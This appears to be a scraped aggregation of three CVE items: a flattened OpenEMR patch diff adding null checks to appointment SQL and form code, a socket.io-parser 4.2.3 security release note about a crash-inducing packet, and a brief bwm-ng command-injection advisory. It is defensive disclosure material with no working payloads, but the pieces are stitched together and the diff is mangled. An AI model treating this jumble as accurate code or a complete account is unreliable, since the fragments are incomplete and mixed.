Expand Down Expand Up @@ -416,7 +434,7 @@ "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($new\_multiple\_value) . "', " . "'" . add\_escape\_custom($provider) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand Down Expand Up @@ -446,24 +464,24 @@ ") VALUES ( " . "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_provider\_ae'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['providerId'\]) . "', " . "'" . add\_escape\_custom($event\_date) . "', " . "'" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\])) . "', " . "'" . add\_escape\_custom(fixDate(($\_POST\['form\_enddate'\] ?? ''))) . "', " . "'" . add\_escape\_custom(($duration \* 60)) . "', " . "'" . ($\_POST\['form\_repeat'\] ? '1' : '0') . "', " . "'" . (($\_POST\['form\_repeat'\] ?? null) ? '1' : '0') . "', " . "'" . add\_escape\_custom($recurrspec) . "', " . "'" . add\_escape\_custom($starttime) . "', " . "'" . add\_escape\_custom($endtime) . "', " . "'" . add\_escape\_custom($\_POST\['form\_allday'\]) . "', " . "'" . add\_escape\_custom(($\_POST\['form\_allday'\] ?? '')) . "', " . "'" . add\_escape\_custom($\_POST\['form\_apptstatus'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_prefcat'\]) . "', " . "'" . add\_escape\_custom(($\_POST\['form\_prefcat'\] ?? null)) . "', " . "'" . add\_escape\_custom($locationspec) . "', " . "1, " . "1, " . (int)$\_POST\['facility'\] . ")"); // FF stuff "1, " . (int)($\_POST\['facility'\] ?? null) . ")"); // FF stuff } // INSERT single } // else - insert } elseif (($\_POST\['form\_action'\] ?? null) == "delete") { Expand Down Expand Up @@ -496,7 +514,7 @@ $note .= ". " . xl("Use Portal Dashboard to confirm with patient."); $title = xl("Patient Reminders"); $user = sqlQueryNoLog("SELECT users.username FROM users WHERE authorized = 1 And id = ?", array($\_POST\['form\_provider\_ae'\])); $rtn = addPnote($\_POST\['form\_pid'\], $note, 1, 1, $title, $user\['username'\], '', 'New'); $rtn = addPnote($\_SESSION\['pid'\], $note, 1, 1, $title, $user\['username'\], '', 'New');  
$\_SESSION\['whereto'\] = '#appointmentcard'; header('Location:./home.php'); Expand Down Expand Up @@ -657,12 +675,12 @@ <form method\='post' name\='theaddform' id\='theaddform' action\='add\_edit\_event\_user.php?eid=<?php echo attr\_url($eid); ?>'\> <div class\="col-12"\> <input type\="hidden" name\="form\_action" id\="form\_action" value\="" /> <input type\='hidden' name\='form\_title' id\='form\_title' value\='<?php echo $row\['pc\_catid'\] ? attr($row\['pc\_title'\]) : xla("Office Visit"); ?>' /> <input type\='hidden' name\='form\_apptstatus' id\='form\_apptstatus' value\='<?php echo $row\['pc\_apptstatus'\] ? attr($row\['pc\_apptstatus'\]) : "^" ?>' /> <input type\='hidden' name\='form\_title' id\='form\_title' value\='<?php echo ($row\['pc\_catid'\] ?? '') ? attr($row\['pc\_title'\]) : xla("Office Visit"); ?>' /> <input type\='hidden' name\='form\_apptstatus' id\='form\_apptstatus' value\='<?php echo ($row\['pc\_apptstatus'\] ?? '') ? attr($row\['pc\_apptstatus'\] ?? '') : "^" ?>' /> <div class\="row form-group"\> <div class\="input-group col-12 col-md-6"\> <label class\="mr-2" for\="form\_category"\><?php echo xlt('Visit'); ?>:</label\> <select class\="form-control mb-1" onchange\='set\_category()' id\='form\_category' name\='form\_category' value\='<?php echo ($row\['pc\_catid'\] > "") ? attr($row\['pc\_catid'\]) : '5'; ?>'\> <select class\="form-control mb-1" onchange\='set\_category()' id\='form\_category' name\='form\_category' value\='<?php echo (($row\['pc\_catid'\] ?? '') > "") ? attr($row\['pc\_catid'\]) : '5'; ?>'\> <?php echo $catoptions ?> </select\> </div\> Expand All @@ -684,7 +702,7 @@ </div\> <div class\="input-group"\> <label class\="mr-2" for\="form\_duration"\><?php echo xlt('Duration'); ?></label\> <input class\="form-control" type\='text' size\='1' id\='form\_duration' name\='form\_duration' value\='<?php echo $row\['pc\_duration'\] ? ($row\['pc\_duration'\] \* 1 / 60) : attr($thisduration) ?>' readonly /> <input class\="form-control" type\='text' size\='1' id\='form\_duration' name\='form\_duration' value\='<?php echo ($row\['pc\_duration'\] ?? '') ? ($row\['pc\_duration'\] \* 1 / 60) : attr($thisduration) ?>' readonly /> <span class\="input-group-append"\> <span class\="input-group-text"\><?php echo "&nbsp;" . xlt('minutes'); ?></span\> </span\> Expand Down Expand Up @@ -730,7 +748,7 @@ </div\> </div\> <div class\="row input-group my-1"\> <?php if ($\_GET\['eid'\] && $row\['pc\_apptstatus'\] !== 'x') { ?> <?php if (($\_GET\['eid'\] ?? null) && $row\['pc\_apptstatus'\] !== 'x') { ?> <input type\='button' id\='form\_cancel' class\='btn btn-danger' onsubmit\='return false' value\='<?php echo xla('Cancel Appointment'); ?>' onclick\="cancel\_appointment()" /> <?php } ?> <input type\='button' name\='form\_save' class\='btn btn-success' onsubmit\='return false' value\='<?php echo xla('Save'); ?>' onclick\="validate()" /> Expand Down

CVE-2023-2943: bug fix (#6079) · openemr/openemr@c1c0805

socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3.



⚠️ This release contains an important security fix ⚠️

A malicious client could send a specially crafted HTTP request, triggering an uncaught exception and killing the Node.js process:

    TypeError: Cannot convert object to primitive value
           at Socket.emit (node:events:507:25)
           at .../node_modules/socket.io/lib/socket.js:531:14
    

Please upgrade as soon as possible.

**Bug Fixes**

*   check the format of the event name (3b78117)

**Links**

*   Diff: 4.2.2...4.2.3

CVE-2023-32695: Release 4.2.3 · socketio/socket.io-parser

All versions of the package bwm-ng are vulnerable to Command Injection due to improper input sanitization in the 'check' function in the bwm-ng.js file. 

**Note:**

To execute the code snippet and potentially exploit the vulnerability, the attacker needs to have the ability to run Node.js code within the target environment. This typically requires some level of access to the system or application hosting the Node.js environment.

**bwm-ng vulnerable to command injection**

High severity GitHub Reviewed Published May 27, 2023 to the GitHub Advisory Database • Updated May 30, 2023

Tag

#js